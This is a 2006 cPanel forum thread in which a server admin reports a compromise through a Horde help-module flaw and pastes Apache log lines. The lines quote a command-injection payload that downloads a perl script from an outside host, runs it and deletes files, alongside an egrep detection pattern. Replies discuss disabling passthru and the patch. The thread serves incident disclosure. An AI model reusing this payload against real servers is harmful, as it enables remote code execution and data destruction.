Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Security Update: HORDER Exploit

Discussion in 'Security' started by stugster, Sep 8, 2006.

  1. stugster

    stugster Well-Known Member

    Joined:
    Apr 16, 2002
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    306
    Location:
    Edinburgh, UK
    cPanel Access Level:
    Root Administrator
    Hey guys, just letting you know that our server was compromised and completely messed up last night by a Horde exploit.

    Here's an output from our technician:

    The hacker got into the server using an apache exploit:
    ------------------------------------------------------------------------------------------------
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] " GET /horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 404 -

    -------------------------------------------------------------------------------------------------

    We're going to have to migrate to another box - rather than just messing about with the files.

    Just a heads up for you's!
     
    #1 stugster, Sep 8, 2006
  2. netlook

    netlook Well-Known Member
    PartnerNOC

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    166
    I think passthru() and other "dangerous" functions in PHP should be disabled by default on all webhosting boxes!
     
    #2 netlook, Sep 8, 2006
  3. randomuser

    randomuser Well-Known Member

    Joined:
    Jun 25, 2005
    Messages:
    147
    Likes Received:
    0
    Trophy Points:
    166
    Was it a Horde vulnerability or an Apache vulnerability? You state both. Your logs show Horde. Which would mean that Horde is accessible on your server remotely without first authenticating for webmail.


    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -

    [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -


    The 3rd log was a 404. The first 2 logs, shown above, are from April. The Horde exploit in the logs is old now, having been out for a few months and already patched.
     
    #3 randomuser, Sep 8, 2006
(You must log in or sign up to post here.)
Loading...
Similar Threads - Security Update HORDER
  1. NestMan

    Security Advisor says there are EasyApache updates?

    NestMan, Jun 24, 2016, in forum: EasyApache
    Replies:
    11
    Views:
    969
    Infopro
    Aug 16, 2016
  2. joaosavioli

    mod_ruid2+jail apache vs suphp (security)

    joaosavioli, Mar 21, 2018, in forum: EasyApache
    Replies:
    1
    Views:
    93
    cPanelMichael
    Mar 22, 2018
  3. efuzone

    Email Security Issues

    efuzone, Mar 19, 2018, in forum: E-mail Discussions
    Replies:
    1
    Views:
    94
    cPanelMichael
    Mar 20, 2018
  4. akaynar

    Security for my forum?

    akaynar, Mar 17, 2018, in forum: Security
    Replies:
    1
    Views:
    61
    Infopro
    Mar 17, 2018
  5. ALamoudi

    Access Denied: Security Token Failure

    ALamoudi, Mar 12, 2018, in forum: Security
    Replies:
    1
    Views:
    87
    cPanelMichael
    Mar 12, 2018

Share This Page